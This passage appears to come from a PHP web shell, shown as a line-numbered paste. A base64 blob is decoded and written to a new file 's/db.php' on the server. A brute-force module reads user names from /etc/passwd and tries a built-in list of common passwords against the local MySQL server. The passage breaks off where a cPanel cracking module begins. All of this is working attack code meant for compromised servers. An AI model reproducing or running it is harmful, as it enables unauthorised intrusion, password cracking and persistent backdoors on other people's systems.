OWZ5Y2JsZjVlUDZmL0FjcmZBVjFRWDJTRHVNcHV3cmtubGtaUzdqR1hxVXJUTUZlZEpRZDkwNjhZZGtkZFhkZ2Zhak1Tb3V2RVFrU3pCQWswVHcrSXMwRW5vN2t0WXI0RzI0RHJBdGh0MnY2d3hITXk4RTh4QktFU2V5eDJQdTVKMVlaZzRBMFRlTW4yMTV0MmE3dEdtNGdoQm1CUXR0L2dSY1BJQ1gvZzEwQ3Qyek1LdmxWMHF1VlJvQjdaN1gxY2c5cjd6elVNZTQ1bFZDNFd3d3FnYW1rWTJTZ01wMmNwNGJySTZaTkRXNUJYVzNrK21HUkl6ZFlHUzFiMXdEOCtySHFyTjNjTEo3Zk1xZUlwNDNwREFxY2pYeHorMzlEN3NuM0VQTWNQQWd4TjFqbm9iK2xZaFJrWjZJYUtvRzNCVnRrWm5udFd4SGxndVk1bjUyUENpRk0rZjVVMmJqdHd4SW50a0kwSEM2OTJlNUdsSEY1TXJWaFI4cjcvUHpwME8wSFVBblVRM3VmUHN3ZkRqYVFkZWdOUUludTZkNld2N3J0OTFqS09SVzdPKzkzenNWTFI2SFkyWStzUlRrN1pkWWI0VHl4SmZDMkdiNkY3dFpnV3ArNmcrUjg3Q0Y3T3p1NzBLcjN4MGZ2cmViYmpmWCtRN011UThaNHNZT3RnNVZ2M3ZQU2NrWGc1UlVPOE9sT0ZxNDM3ck9rRUxXbjJub09UVzE1ZTBBS2Q1QTdHYWJ2VXFlZjdodVR2eXRHRzZvSnB1U3FGMnU2cUordmVOUFBkZ3pZSzdqcVJsay9Qcm1kendlcG1NNVNMN0IzM1Y1OUFmcEQ2ZnYxbDlpaGp3VGc2eDllVHJXS2RQanlaZUhVT1RiRSsrOTBEdjM0eFhhZk4yMlFYNzZFYmZKTVZpVFBsZ0xpNTdLMm5ramZrTk52ZTBxSEtTNTVBMEhIaGxFR2Z5Skdadk51a3ZLQ254ckhWb1N5U0QvZ0NyK0Y1SGpjSzlFenVweUdmSWptQjFmUm81emFDVnlWb3l6eUZmaWtoYUZhekNnVTFsbW9hNkhPV3hYUXdiWnJaZ3pTbDFOWW1NQnRwOGNocUs5OWVwQnZnMS9FcVM4R0tzODVIVXBYT3BDejJwMTJtU1piU2lkakc0SWZab0dNYXlSdlVSRXNRaVNzTyttWXBKZDdLK2dBNElkRlBLTW9PcHl5U3lBYVZGcjBLbzJ6Z2FvMlNrQ2NlTWtGQ2RLb0hUVEphQk9sOEJtZlJpYU1XRGhzOGlvV2tkc2VMS2trcm9yZ0JCV3NUeGxnMjZNTE1LY0tBS3RJQW9nclB6cEJ0ZUpLL1VGckZIZEFqTXdwaEU0RGdUS0d3VlJreXA1aHJIMGJUWlJqVGRiQTdObEJmelU0MldCZklIRkZ1UnFKOUdYWEEzMk9HWEZFM1hEdlkvSU11VThXM0tadXRsU0pFZ0RyTVNMc2JxWjFzRGVUNGhhUkFxbnVGWWZSN3BkdHc5cmplVDhneHV6aWkwbUgyY0RXUlRuL3FvQnlUVzBNZ2FGMEdmRFMyOTB0R3Npa25DSjdwZ25UWldHUkJDbU1LT3FtZ2FlZ0p0cFN0RldITk1Ec0Z3aTFrV3JKbjRSQ21QMmVEQmJ3NmJVTXVzZzY4bEJKU1ByYWNua2tMeTNjcVJJcjMyZnNBM1NGejZSVTR0VkJ3eVdBZ3lRTmFTelRiUFRVQ2lGQUd0TTFXbTRJbDZHSVdwSFFZZ0YzQXJJQmpXY2t0aVdodnZhS3NMdGhOV1lpK0Q4Z2dtYlJ2U0UrN1RSY2xWc0ZRL3B4NlVmMzFpaEkzanUvV2I3WlBlRVQ1SW5vOXhJUThiWkFIV2o5WFZ4d2tmTG5wZ29VM1I5WFZ2VHlMWnlRNXBJYWg5SmNnWS96clExNnc0UWV5NkxCeGRuS0o5bUYvUWY2Y05JOGcxcXd4b3hPLy9aQUpMUmd0WU83ZllKckNDcUFyWXNaZEJndWxFSW94bWVVeTJ6ZDZRWFFkTGcyc2taSlZUZHZYRGlYdzlZZU5hUW9uK0ZCeU5RdlZVelNpV3h3M0NTYlFRakxMTGF6TnRsSE9OeC9RUzZRUjBSWmU1bDA3aStTOU9BaExqYkp5ZXpsYUZ0KzZ3Q3J1aUt2NFNpZDRwbDVjVDBoa2Eweko1aHlGbDU1T0UrZXlpZXV1aTdiRzR5VHJaOENkZGZYNE1MN0xubEdIWlZuOUhoaFBwNlpHaWZTRHp3UlhnR1NxSkxWYzd5bi9EY0dFNUdlcEI1dllFRUFMSEdOaDNaRnhWWTVXb1JOdFVRSVFaZUp1ejhNaUJTMEZXODJTeTZRbzNQcnBZeHJSN2xzZWdrbXBNbllPZTlQUVZKbTdQMHlFUzNHMm1xZFhJNFRLTGhTRXZabHRCMUxjUUpwOTNnbHVFYXVVaDVQeU5YRmNid29aOXE3cWNYMGFUcllEaW5vNWNGckpEczhjaG1zL21nSXlSNU9DTEdFV1lEeVUybmQ3d01CUXBmNnNvRy9neGdmd01WVG9zMWF5bTFyVU1iZWRDeWhVbzV4aWZJZ3diTkZrZWZWVUdobzg2bitGenplYk5wamt2cGpCUFAvS2ZBbzdhM1RDTmFVQmpOa1N6OGNlRE5hSHV4NWtWOTkrQjArSThQaDZlN0orVGFWRTNvY2ZQd0NKbXA2WE5nT25RR0JyQW5XalpzbE9wbTJVMVJSeWFzN2puUzlsQXBlWDd5RCs3aVJxOTRqR1hXUW9rV1VyZG0yNFBWR2xwb21DaVRaM2dnVlRXTGhkemZlZ2tZOTZGeE9XajU0QmFjekx3YnZqM2MvL0QrNEtTd1NEaktLcnJLeVhTNThkM0xoY3pWYVMvRlQ3TWllSDZ2bXROUGluTmFMdzV6T0lyS3BGMHc2YjBML05tRVJzck94UmlpUXViQmNqWXJaUDd1M3hUeXBIdWprTDk3bmNaZU5oZG5oMUlwMGEwb3FwSjk2RlBVWVdPNHE0NHdiR3gwWGkxMkNvVXlBYUI4aU1KNUJBb1FMaHF3aW5FM0pxZ0RPa0p4S1c2azczWU0zREl0QWJNd0luQ21FMUNHTG51WEdJZlJyb1Z1S2doazRwMEF5RkFFZUJ5T2trVm5KUml3K0I1UXlxZjBaVWdhaGxWd2VrQmcxcVVqcmVSYk1kcG1tZkNXN05KNXI4bEZXZTZ1T0p6SnJCdDdNNjFaaHkxZnYwd3FjVktpUytYYnE5V3FpODJlNVVOSDFVeXExTlllTDkyQmoyUHY0ekxxbUxNaVkzMUlUQi9Zb3k2OW52ZkdjdzkvYjBiNnJOaWVWN2luTzRvbmR3WnAybHV1Mmw4WFlEZzRKUnR3N3k2VDhrdm11U1hzczBQLzlmTHRMcmxCd3grRElXRXYySUUrbnFBckdzVzl0RmdoYTJ5cW1xNDhxUGkza2s1Ym96SUJOWUw4R0tNYXlpUlRWbFhKYUNhODIrdURuck1DNmtGT2UzbG1heS9QeTdVWFptQ0pjbUtMbmkrc1hKdTl5SFdjbUhuMXJhalJaTlVWdTNOYWVkbVR5WTFDbXpMci9mdlI1NE00VGYrRFRCYm9GM3hjZFdISkNHVnFLRFhMYUVMV3hDVjlCNFhCYTMzWnJRTUwwYWhDOXVtZUJNYmxCSm82R01IR1lLQ3hNY2xGMVVIMWU5UWp4ZS9uendoL0t6RFd1YmkyaWpxcVE3TVQ5RUlTVnNsVkFCS3ErdEY0QTM3NkVVaU1VZGx1dHJXczNjV1RGaUJ4eDFrK3haZDFaTlZXbTFzTmVsMGFvYmtSVjJFVThHS2RiRkd6M25vQyt3cnBmdXdyK0lVaTR1VStWbUtqRUJPMFBTVFZGQSt3YTJFTEpVTllMVW4xb3czSS9oOFF2SUgwVU5GM2xlc2EwMGgrNVhYaTIweWtocmtXZ3ZSby84cEdDTENrZC9xeFV4ZE9QNlNmcVZPcnE3TW92T3VvZmtCdUdnZno2b3BCcThtYmtJYlFJdmJQTlNWbm83L1IvK1hzdjZyOVgvb2J0Y0V2K0dzalFJSUNmdWhxSkttdzN0eWpuV2cyZzVySTZINnk5dCtmWVJSdXEyZjlxOEZhalJPUWkwaDA5WHFGNnZsSjRVaE9GWnkxQmh4RmY1dmRPQ3Q2aHNQV3Bkbi9iVnZQU3RXYTVvYWVNeHg1QW90NW0zWkhvMjVWcGloRzJUMzYyc3daeWszcy9SbERVU3NZaDFvSnRuUWxTS3l0VVR5YVpJRzZpSUhsUTc2ZXhTaUEvd0V6RE9SUEhoRHpDb0RBMWp3Y1gxcklnT0hDQjVrWFJsZXh0K2hSTTJDYjRhRExYb1VSUTdXYWpKK2tqanNaYVNWbG16U1A1bUhoT2ttU1JHT2o5LzNibUFKYWFaTkJDNVZScXhBZUFiMlJjUkVnUEdHWEFkbXblueGxVMGpydnZ6dE1Rc0xuSWlYRTlzR09VRW9JdEtDQlFZOW1RTmhQTUJ6UGZDODBLREpLdjZ5YlUwSDlrRlZReWw0OW54V2RNcGVaZGVUWUo0T0FYV1hBVEVLcVhHZGwvc0pkZ0w3blueaZkJQUEZuOTBlODQ4OFFyMjN1QU5jS2RzOHlKSWMvbDJTTm9Mem95T3d4bTIzY0tJeEwzNXRPeVFuTWU0QWlBOXVUS2hCWUFKc1lxMnhlTEJXMXdnNTJhLytYMjgwdGx3UkhOWnljYnA5K2tENTY0c0NRNVl0TUVFbDBvM3VwTjhTVGJuVmNVdWFKbHN0U1JlbDl5V052b2JRU2E1STB1KzJISERrdnI5Rm1tbVNsVEoxalNGckFPU1M0MndHTmNiUU1kY0JkRmlMTGg3VTFxNnRzT2xKQ0xnTzdCeFplblczTkRoMmwrT1hkbzNuSDd2RUFKK2VEdldGM09IMjBrL1J2WU9ITmduTWd6cUVHV21tVmtkRjBKVUhycGxHb1ZGaTZwRENLcmxGMmptZkIrTExyNkFzVUpFR3BJVnFMelRpUmNKZklaK0l3RjcxSVppQUxaVzloYmFRK1hmNHZsTEVLblNzakVTWVB2NHdWTWVudGh1ZWdWeFR4UjdPWmw5MnRiMWM2ck5UYXNjUGdUQ1R0djVONW1CdHRheDcwTXRIeVpueDVJdkRTR3VpWm9NVHJtWHRBTng2eDdTVmpmYy9ERklNbGUySms4aDkyYW1Uait4NG5SM2w4dWRPakU1WDhOcXhseDBobExyeU1aQ3gzTHBaSndqc2hyZVgwQlVocmNXVWhWeTB3VTVXWDJwZGFvaFplRnU2MjZKek1MQ05saFdld3JuQ0Rua2FwTjVOaDRtM3RwY1A5NFk2VzBjWlVYcTczaDJLeDhRZTREYzBkOFVvOGhXMS9rNXdHZDdwZ1NjRldYZXc3RG5mUzZXZDlEVmhnSTM4SnlKOUxNRXVhOXgwVDhtOWRJV2oxSFhYOVFLMTZ1azBnVGdBYVJScmQwYzc0TXZvT3BjekZCQXdVdDFBNkRSbVozaWgvSDhJeDcwTVk0dWdMZ2hUeUVWTFBtOXlJSE4xUmFpcXdHOFc2a2hGZGhiRm5YM2JadmFiYlFXelFZK2dWaldRLzYxeHh5bUpjNnBuN0VvV0lGeHdYNldxaDZ0UFlzaSsxcm1ZcGpxOExzZk0vL0NDaitFcXVlb0VhR0UxdStJWWRYL3EyNDZoMDhCb29vd21IZ3RIZE5YZHJFbnhTM3JpUzY3dnl3blB1WnFvNkJteXBxNmQ4MzVOdVo5Sm0wZWE5b25ndDFTSHpnZSt1UTBNNnVoa2IwQTVsV3Bpb3QzRVVYUVkraGJUWEJic0E0ZmNzbUpJS2l1NE9rSm5CTlRwWXFFL25zMmdFeTdSQ0dnNjZRZFNUQm5YOU1rdUhJLzA1Um9ocnY1SVZ6bHltQjluMG1JdnIxdlF0QUVtVGY3K1N2OXU1aXBqSmlpZnNzL0tTbWZVaURQMGVIaDBlbjZJVzJoVlBuejZ4d21kQTJwZDNWM2RpamFqVzg2MzFVRkxuY3lmUjNBTWxEL05sV3dweGpPeENrbTRqUDVhZW8vRXlMdmlRK1BFU3kvMUVSaXZHWDZHZDBOUFZHVkFGVVpHSkVFMm45RFNQZUtiaXE4aVhPUGFER2RmZU1MV3RtQzVDaXNDTWt0NlpZQzlhSmNYM0hMZ3c5OXdEQTZrZWlIVWhxWnRhcW1oTlZMSWdHQ2tteVJPYUxUbWhDdlZhV0FkQk90bG1RYzBxQXN2U0dtQmdFbzhmaTlLQ3hNWnZZaW5Wa1JuVktXV0MzVC9tSjFvK1VaRTFYOXNrUlllUlN5cllkVnRPWmFaRHRjaHphSHVMenN3Wmkrd0podnAvUmJBTS9teWhrdk11aUJQV3cxeTVQZzFwSlBqMTZOMkczWWtXYkxOSTd5ajJQOW5rdEZzTitVT3pRTUQzVnBjR1FGVFUxVzZMT2VpaUNYQ3hhK3dnUElLR3l4aS91ckdJQWh0NHhwOERibVFuUHpRTmUyelVLSDhuTHExcExoMkEzS2VnTUQwbWVHUE1vaWErdnArRWc4bnNlNGxOSnU4U3R4TFl3VVh2Q0t1U3JxWkxaRkFqSVdCbXlZdnhCaVFuSldjUjZKK1lYNldSZlhYWFd5ZXNkc2gzUlhETC9LY2ZUN3pRNjd6WmZ2djdyOGVISHc1MjJ1TG5kL1JQUjc5NThoSjJ6dkozUmZCcGtlekxCSm5EVnJMenRTT0FicTluYnE0WG1nSHpHVFFpdkU3ZkZzcTlhbHZ1QzFtcURIYVRKZ1hMMmVSYjgyVTNwQmtCNlVIYTNpUFdGV3JrNG43Mk5SQWZQMm1sUlQxb3M3SGhoeE43R0RMNmpIL3RqNWNwM29tYytqcDZ3R3hRd2hTQU5GUzE5TE9GV050bFQ5UnIvQ2JvT3FKUVIraUE2bitnVTFVNkIxRUZXa1lYRUNZWC9tdzJ0TkJLSEs5TkFiZm9iaXczU2VyUFZjTXlMMCsrNWpLTlJPRUhJSG82a2QvdlljOGhaZ0x2cEMvM2JwSTQxT2xGdkN3bnFrcS9sZXpySUJsQ3pXZ1pqL0dhS21KWThFMWQ1THNUTzdWYVlSRFpuL2pvOWRTUGNITzJBQnA0MFRmR1FQZkt0TjVxYnFvenpkY0xkUS9XYU5acW1jZXNORmd6Q1BDajQzMFJLK1VsdmFDSFBYbGVPVlNNZWlicDdCSU4zeXhHU1U2LzIxaXVyNlZwekdOc0w5OHRReW5CZm55OG5kdFY5NU81RkM4b005ZW5zRXdTaEtpL3pnVjJFQUxpYnZhUzcyMmU2TVFmTGM4NUd0eFdpUFZicFBkK3ZUUkZnMWNDZ3A0Mjh1TWhMbEF2QmFXaTdERlQzUG8xbFZvZGpFbXQzQi9GRVY2SjgzV0FpMElOMjJBQ0hRd24xYVRtbXFmdFRHZnVkWFd2aTFlWjFTdFYrTTB4ODExKzNrRmZqZ0hsT2J3MFowVXlOcitxdzkzYkZKZUpOWXV4K1RVNyt1Y3R5Tmd3b2tmUUVBTmVqK1o0ZTQ3Rk43NTQ4MkFmamp1UjUvY25yR3REQXFiMmloaGZzblRDeXd4dGZVMWJSWXZUZlcwNnlTNmpteU85NHRxQWl1VlhyQXBDNmFxM1RyNzFhd1Q2R0JndklhcmJoK3JXb1Z5L0ZISjBTaStId2ZZRWRCSVdFaUdiMUYxenZ5RUx3a2QyeWNyeThTekExOGxHUWVqRk54MUhNYWl3eWpHM1pEcXBoMVVmVitpM2RmZGVIVTF3dnYzQ3E1Q1o3S2ZseThyeWVCK3p6eXFYQS92SjFrODFXNDBYRWp2d0VkOFp0dEZMckhUeUhpejBtUjFEWkZVVHlpdnBqbjFRSnlVd28xYXY4NVhGS1NuQVRnYk9QdjZYUi80Yys0TTh2a2NWZ2VmMURydWwrT2M5Sy9iVGZNVTdrQ2lHeUt5Q3dFVkhseTMwUnVkalcyWkRjbTN0YjV2ZGJwT3VIT09UUDZRSjRpdGtaZElIMXNrUmlQZHFoUlZXZWt4Q1ZNTG9pcDVOMERFdE1vUENRQm95OUVQbkNhdXkxTTVOMllxbm5qV0p6bXJvalkweWFJcFdrU0VxTXJzdTFzR1N4VmVrTm9wdGs1LzRrblIyeXNtQ2NxWjhXREJiYkU3UVJrZ25nWHBUS1hhRnpoVGwrUmpEYXg4dyt4RTJDWmM4TFdPSU15eGFidzNxbWZTbWVpYTFzbHpJemdSem02NUVMM3Rtb0ZZeGtRSHNTY1k1NVJ6QTU1NHFuN3pZT0VkMDBJajlnTFVHVWIxVVVGM1J0Ri9sY2c4aU54c3Rhd0JiR2NBLy9DUjdpOXpTYTZDQ3BSQmtHd3pmb0RFc3d3UFZZTFVvcGg0aWVnU0U4aXFoQnFmRmdvUnhyY2lXTWdXTEJzWmVxWWdtME5qSnZ3ZHBzTGRHY2M4MUdtT0Z0aXJMZy9SSXFaSzhONUZEbEZIWjdXeDJMSkZheldpUnFKUGJvSzB5L214bXBuZXpJRGsrbXRaTG1HSjdDcFhJZ1h1RGFwMDg1STU5WDI1aFZGQ29ZQjBQMDhtdzNHNHBnZTZMNW9zbkw1NjJYbTdLTngza29USTVaQ1hRaGdVa2ZvRUV6Q1BNYTRvR1dObS9qdXhwWk9GOSt2TFppK2QzSWlXSUlzYjNxekIrb1kxbHJmdDlsSHUvVngzNzAyK0VlSE9UeXZsdEpqWVdLa2FTUTE4Yy9YYjBuOEZDUHFCWHdkTk1EcUZSWE9aeVVLS0N1UGFERk5LdkN3YlArWi9qYUw2STZhVUdBa08vQmxUaEpUeSttdWhRY0tNZElNYWFvUGR2OE9veGhTd0VNU3BjMENYMTRDeVdkT2tzVmF6M3hLOSsrZzR5OXlHVDYzYzJOdGJXMThUNitzK1BmMjYxbWkwNytFY2pKbDJqMjBOTlEyZWVEYnBLdEgrcXEvZGdFZU5heTRyeHF6N3k1NHRVdGZYeDQrcWpYUE1oSy9NNk0yWFdRTStDRDlsQzdvL0tZcllvWnNqcHF4cFY2elZybjFmMVFEK3ZiZFFzZXByWkZGQnMxcFFmTXdTRFNKZ2lrTXV4bTFNYzJOaERvRW1kRHBod2J0allPdW9KSklLNWMvd0tiNUpuM2dKWG8rZE5KdStveGJJUmRaR0J1eldSM09zOW1JZ1VHaUtyVWs4UnFNREcyNnlva3R4ZUtab0tNd2lmZzBxOU5CaURabWk2cUlmUHVwbUVHeDd5TlZ1bUxrelFFUjBzWFI4UGN4RGdvcVlsRXBZOTZvSTZRd2FMU2pWY0hyQXVJaE80dHphNHNDTWZ2ZU5Xb0kwdW1aSnBQSm5qRlE4bWNtV3F1VWZqcGVnWEZIblAzbXhvdmVPNUtkaU1ndjZ4NDQ2b2RBenJBaHRSWG9xdldtdUlybkQ2MTgrYS9ldW5vLzUxOHhuOC94eitiOXIvTzZwaU5Kc01wVnRieU5nbmE0U1dZWEM5dVJNbHAyZzhWekFsemVhbWRQRkRTbW43ZGprQnZFSnhnNmZqb0xxMjliZUdNdGZTRkpJejl3WSszQUVlVWZ6OVpaNkVMcVdHSWtBbld6ekhRM0xKbmxhK2JPTGQ2S3E1c2d2WWJoTXFWTEZmVnIwZ1hLTGtIcFNVc1gxdnltN0Z4b1pBajE0d05WcElXZmZXWmZlMnRzVG1zNXI0SzhzRDdnYVd0WXBsM0Ewb2JNR205OWRQUDFiTE9vTEZKWFYxVjZDOFNOYjBwdGNUcmVJT3J3VUdUbE5VZjltTXo4NEhLWHRXYXY5S0NrMWt0UW1vVS81MVZTNnA3R3lqT2NKMzlQMXJxdkFEL3RHV2F4YzJWRVp3OW54Z3ZsOE1mdnF4a1N0L2FwVS9LeW5mdE1xZmxKUTNyZklXUFVXT3J6UzR1a0c0MGdoY1p3QUdweU9EbWVNZnNndnhDZnovMUpGRkRTcHJQVldMMGVTWkJXcmx2Y3psYVlwOFdSb0dhY2d4eW5yN2hGSGlUU2JHUHo0RFA1OXNXcmwveWtmOWpLNWdWOG5oK3JOUVRXN1hhdGYraytkRXM1NnJBalA5YWEwT3RnODNITjJhQzI5OFdYWC9pYk1CMnJTaUFPbVhGOG1PRmdvL3VZYTIzakVMRUUwcnQ2TGViWkZKYXZIL1JUdXRUVmRLZUk2MG5NWmtPZnBYUTMyUUxIdWc3VDI2QWt4TFE5YXNxZmRGSnJFL3pzbjVGdnkvU1ZPRVN3dXp5YzYySnQ0OW9LM3BwN1B0R1doeVM5aFdXcVk1VjFacUQzS3V2RERPWWhWVTgvK2hCRnY3WkhObGtSNTNhNVBOS0dGV1BrNUlQUld5akZZVFZkVlMrenhQSTRJckduQ2tvK2s0Wk43NEN2UEttcFBjQjhETUNrUXBxQ0pzK3hMNFQ3NElYYlZod0RNNlNjTWVRRkJ1OGNTamdMZDJiN0FmREpmVmRKQXRzSkRZcFNTUHNDZ3p5MHRjQ3RuM1NPa1h2VVhhVmZvSUJiY3U2Y1pCK2Q5WWtUSFUvUHlzQlk5cktmUFhWbVFrZVZWQ1RqRUNnQzZYZEZ2Nk5reGlSYlRMUDVKaTNYUjE3R3ZDQkY4ZWw4Nm9hdGJMdG9aWXZsdll6THA2c3RmNmd5TzZjVTExelROVEJXWVlrem1qeTVBRGxjS3JsUU5IdmZva1RUZ3VjdVFWYlVmOUVhRWN4cDNkZDlzZjlrK0ZLK0VsK01CMXJDdG5YQ1N2anFNMzBQa0QzK1FwdzZmK2drMUpkWGtGbk9xWFY1YVFCRGd3Y3djOUpaSzdNdnpLSHJIZmQvOVlQVjRjcWxVeVdvaEVjdVNTVG9Fd2g2NjlEL2tQcWlqTitWSzlvKzhjSGUrOTN6Nyt3eUdqaHFBUG9uQUlDdFhIcGM4UldVMGJvZlBoWU84ZkgzYi80cVRtaDIxU0IvaFd6eGtEcVBISjVHV01rTnQ4S1FzbmFzbmJhTGFjaDZicGttdlVTOXJPK0J4MFJwYlVwWG9taWlvbE5icWRLWjlYQmZTMU8yWXIxc0hhU1ZkSkw0V2w3dFFkOHl5N1pGdlhZbHZwaUFzaGkzRVlSVldqcjJXWGh1Mlo1dFkzNjgvcDZxVGtzbU56UGd2NW9yWnFMU0ZKMmRBOFpmV1VaclpPSC9iTGZzaWNzQitFbmw3RlFVcUhxblZUSTNzUmxuMmF1bEQvbVRoNUUyWEZMWHRIZWI2MW5DcTVzZ2NZN3ZlU0FRS1dDTmppUzhEeTdkK3F3NW9RVVNMWGpSOTMxMXNsY2xUU1hsdkx3RzZabHQ5SEtqYTZlSmp6SlpFbzBjZ24wdkJtZUlabXVaalRFc2xnemdLNGpyclZtNHk5aGErUDNFcnd5d3R4dDJXVHF0YjVmcE5ETG1FMXZDdFE0bkZiQ1RKSFA4eWUxVm1XVUFzZk56YWU2aVh1M1J3bGdBVUZMV2VoSzBpM2ZCbzNIT3ZaZHcyWWp1alZRQk9IZi8rL0hQRjB4WFdsMnd4NmpteituTGwxN2hZYnJPT3EyWHptT05pdTY5Ymt0WEdPSnFMWDdpdnkrZno4VS9neXVydVNmMitmUGlpVzJ5bW55eSt6VnJ6NDNFanVHaC9YbnAveEs2OGtzKzFrRHhUZlY4S1JRZWhVaE4rRHZ1UGdoWGFaRHd5RWpJNUM1Y3U5Vk9GUzZWZTVkRnY5QVF2S3BXZGdCN1IvMldrdytURkF4TlhZK1NrN2cxMmxYMlhUZER5REx6d29NbHpLYjh1YTJpcjlLcGR1NHhNTHdDOGRhMFdsNnIyNmdYWFBuMHFJNkNBWG5FOGxsQmhZNDRhWnRFT3FQMnVReWRIRGlabVVHSmc1d0tSUW40SThNeGo4U1Z3ZFVDaS9mRHZBZnFIQitiZHJwbE1hNDJNOVhWaWNxV1lnOU1PRDh2RVNsY2Jwb3I3cFZsWU91dUU2S3BMMElaTkp6YUhTbVpCNWo5RG1zOWhTZjFJd2QwdWt5TTh5cnV0TzlaeWl2NS83eFM4MERvcFJIVmFoZGVrNjk0ZDdlYUdyWngwSFhWSXo5Y3ptK21ha29ReXZvMGh3aVd4cmc4RktKbHc1Z3ZKNjZqKzZSOElrVEtkTEdhN2VUYk9sc0g0Y05qZHorSS9zRUJhT0w3WEZqTTZCbWJQUWYyMkhpdVM5VWd0WTUrRFJuaitiR3FGRWZ5ekNua2dxQTZTbi9Fc1NhbUZRU2twUVd3Q3lmbXlJeVRTMEN6dldjdVU5RzRxVHZkOHFsZkd6TXBkVG1DK2piR1UrcC9SYWxlM0w4MSt1QkR0Z1N5MHZMWEZMSG9VcVc5OG96MHRXdDJRRDN1S3kyU0RUZU9taWFaZ1YwMjAvQXlYVFhiSDU3SnQzaXFKY3p6MEcxS2ZYZ082OWtMRUhXczdDTitaaGUxVWVmbXYyczN6c1dZSTE4eXpRb214M1YzZXhNSlpOdjhqUExOVi9Qa0RseTFmV3pTdVJoVWQ1MkVDRXdlV1FkZGxMbmU2dmVPWHdoSlBtU2NQY0M0VGxUVFk2MHlySUJYVEtzMjkxTFdLZndpNFdvQVduUXlxMTdscXBVa0x5dnk1QjhBdz0iKSkpOyA/Pg==";
  2096. $write = fwrite($f2, base64_decode($sml_db));
  2097. if ($write) {
  2098. @chmod('s/db.php', 0755);
  2099. }
  2100. echo "</br></br><center><b>GO TO : <a href='s/db.php' target='_blank'>[+] MYSQL MANAGER [+]</a></center></br>";
  2101. }
  2102. }
  2103. ?>
  2104. <?php
  2105. if (isset($_GET['jak']) && ($_GET['jak'] == 'brute')) { ?>
  2106. <form action="?jak=brute" method="post">
  2107. <?php ?>
  2108. <html>
  2109. <head>
  2110. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  2111. <body text="#4C83AF" bgcolor="#111111" font="Verdana, Arial, Helvetica, sans-serif">
  2112. <center>
  2113. <form method="POST">
  2114. <strong>
  2115. <input name="page" type="hidden" value="find">                     
  2116. </strong>
  2117.         <div style="width:90%">
  2118.  
  2119. <div id="result">
  2120. <br /><br />
  2121. </div>
  2122.             <div id="mp" style="width:49%;float:left">
  2123.                 <b>~ UserName ~</b>
  2124.             </div>
  2125.             <div id="mp" style="width:49%;float:left">
  2126.  
  2127.                 <b>~ PassWord ~</b>
  2128.             </div>
  2129.             <div id="mp" style="clear:both;width:49%;float:left">
  2130.                 <textarea rows="10" class="coode" style="width:100%" name="usernames"><? if($_POST['page']=='find' && $_POST['usernames']<=''){$lines=@file("/etc/passwd");foreach($lines as $nr=>$val){$str=explode(":",$val);echo $str[0]."
  2131. ";}}else{echo $_POST['usernames'];} ?></textarea>
  2132.             </div>
  2133.             <div id="s" style="width:2%;float:left">
  2134. &nbsp;&nbsp;
  2135.             </div>
  2136.             <div id="s" style="width:49%;float:left">
  2137.                 <textarea rows="10" class="coode" style="width:100%" name="passwords"><? if($_POST['page']=='find' && $_POST['passwords']<=''){echo "123
  2138. 1234
  2139. 12345
  2140. 123456
  2141. 1234567
  2142. 12345678
  2143. 123456789
  2144. 1234567890
  2145. Password
  2146. pass
  2147. admin
  2148. admin123
  2149. admin1234
  2150. admin12345
  2151. admin123456
  2152. admin1234567
  2153. admin12345678
  2154. admin123456789
  2155. admin1234567890
  2156. administrator123
  2157. administrator1234
  2158. administrator12345
  2159. administrator123456
  2160. administrator1234567
  2161. administrator12345678
  2162. administrator123456789
  2163. administrator1234567890
  2164. password123
  2165. password1234
  2166. password12345
  2167. password123456
  2168. password1234567
  2169. password12345678
  2170. password123456789
  2171. password1234567890
  2172. 123456
  2173. 123123
  2174. 1234
  2175. 12345
  2176. 12369874
  2177. 123456789
  2178. 112233
  2179. 12345678
  2180. 123654
  2181. 123654789
  2182. 1234admin
  2183. password
  2184. passwd1
  2185. password123
  2186. test123
  2187. 159357
  2188. 147258
  2189. 159951
  2190. 123321
  2191. ADMIN
  2192. 195159
  2193. 147852
  2194. Admin
  2195. Administrator
  2196. Demo
  2197. User
  2198. user
  2199. useruser
  2200. 987456321
  2201. 741852
  2202. 321987
  2203. 357159
  2204. 1234566
  2205. 1234567899
  2206. 111222
  2207. Administrateur
  2208. administrateur
  2209. 0123456
  2210. 0123456789
  2211. 0147258
  2212. 147258
  2213. 987654
  2214. 963852
  2215. 369258
  2216. 456789
  2217. 456321
  2218. 456123
  2219. ADMIN1234
  2220. Admin1234
  2221. admin123456
  2222. admin1234
  2223. admin01234
  2224. 000000
  2225. 142536
  2226. 632541
  2227. "; }else{echo $_POST['passwords'];} ?></textarea>
  2228.  
  2229.             </div>
  2230.         </div>
  2231.         <div style="width:90%;clear:both">
  2232.         <br><p><input type="submit" name="submit" class="inputzbut" value="Go !" style="width:120px;height:30px;" /></p>
  2233.         </div>
  2234.         <br /><br /><br />
  2235.  
  2236. </form>
  2237.  
  2238.  
  2239. <?
  2240. if($_POST['page']=='find')
  2241. {
  2242. echo"<div id='result'>";
  2243. if(isset($_POST['usernames']) && isset($_POST['passwords']))
  2244. {
  2245.  
  2246.     $a1 = explode("
  2247. ",$_POST['usernames']);
  2248.     $a2 = explode("
  2249. ",$_POST['passwords']);
  2250.     $id2 = count($a2);
  2251.     $ok = 0;
  2252.     foreach($a1 as $user )
  2253.     {
  2254.         if($user !== '')
  2255.         {
  2256.         $user=trim($user);
  2257.          for($i=0;$i<=$id2;$i++)
  2258.          {
  2259.             $pass = trim($a2[$i]);
  2260.             if(@mysql_connect('localhost',$user,$pass))
  2261.             {
  2262.             if($pass !== ''){
  2263.                 echo "<b>[ IDBTE4M ]=> </b> <b>User[<font color='green'> $user </font>] Pass[<font color='green'> $pass </font>]</b><br>";
  2264.            $ok++;
  2265.             }}
  2266.          }
  2267.         }
  2268.     }
  2269.     echo "<hr><b>You Found <font color=green>$ok</font>BY IDBTE4M</b>";
  2270.     exit;
  2271. }
  2272. echo'</div>';
  2273. }
  2274. }
  2275. ?>
  2276.  
  2277. <?php
  2278. if (isset($_GET['jak']) && ($_GET['jak'] == 'cp')) {
  2279. ?>
  2280. <form action="?&amp;jak=cp" method="post">
  2281. <?php
  2282. /**
  2283.  * @author: FaisaL Ahmed aka blue X
  2284.  * @Screenshot: http://prntscr.com/7c1p34
  2285.  * @Last Updated: 01 June 2015
  2286. */
  2287.  
  2288. @ini_set('display_errors',0);
  2289. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  2290.     $ar0=explode($marqueurDebutLien, $text);
